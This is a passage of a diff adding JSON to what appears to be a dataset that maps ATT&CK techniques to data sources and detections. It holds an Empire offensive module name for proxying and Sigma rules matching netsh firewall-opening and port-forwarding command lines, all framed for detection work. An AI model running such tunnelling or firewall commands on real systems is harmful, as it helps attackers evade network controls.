creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "network share", + "definition": "Information associated with computer resources made available from one host to other hosts on a computer network using protocols such as Server Message Protocol (SMB) and Network File System (NFS).", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "network share access", + "description": "A network share was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "network share" + }, + { + "data_source": "network share", + "definition": "Information associated with computer resources made available from one host to other hosts on a computer network using protocols such as Server Message Protocol (SMB) and Network File System (NFS).", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "network share access", + "description": "A network share was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "network share" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + } + ], + "external_reference": [ + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf", + "https://pan-unit42.github.io/playbook_viewer/", + "https://securelist.com/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/73638/", + "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html", + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + null, + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows-server/storage/nfs/nfs-overview", + "https://docs.microsoft.com/en-us/windows-server/storage/file-server/file-server-smb-overview" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ] + ] + }, + { + "technique_id": "T1090", + "command_list": [ + "python/management/multi/socks" + ], + "commands": [ + { + "command": "python/management/multi/socks", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "python/management/multi/socks", + "ATT&CK Technique #1": "T1090", + "ATT&CK Technique #2": "", + "Technique": "Connection Proxy", + "Concatenate for Python Dictionary": "\"python/management/multi/socks\": [\"T1090\"]," + } + ], + "queries": [], + "possible_detections": [ + { + "title": "Netsh", + "id": "cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c", + "description": "Allow Incoming Connections by Port or Application on Windows Firewall", + "references": [ + "https://attack.mitre.org/software/S0246/ (Lazarus HARDRAIN)", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf" + ], + "date": "2019/01/29", + "tags": [ + "attack.lateral_movement", + "attack.command_and_control", + "attack.t1090" + ], + "status": "experimental", + "author": "Markus Neis", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "*netsh firewall add*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Legitimate administration" + ], + "level": "medium" + }, + { + "title": "Netsh Port Forwarding", + "id": "322ed9ec-fcab-4f67-9a34-e7c6aef43614", + "description": "Detects netsh commands that configure a port forwarding", + "references": [ + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html" + ], + "date": "2019/01/29", + "tags": [ + "attack.lateral_movement", + "attack.command_and_control", + "attack.t1090" + ], + "status": "experimental", + "author": "Florian Roth", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "netsh interface portproxy add v4tov4 *" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Legitimate administration" + ], + "level": "medium" + }, + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Packet capture" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Packet capture" + ], + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as 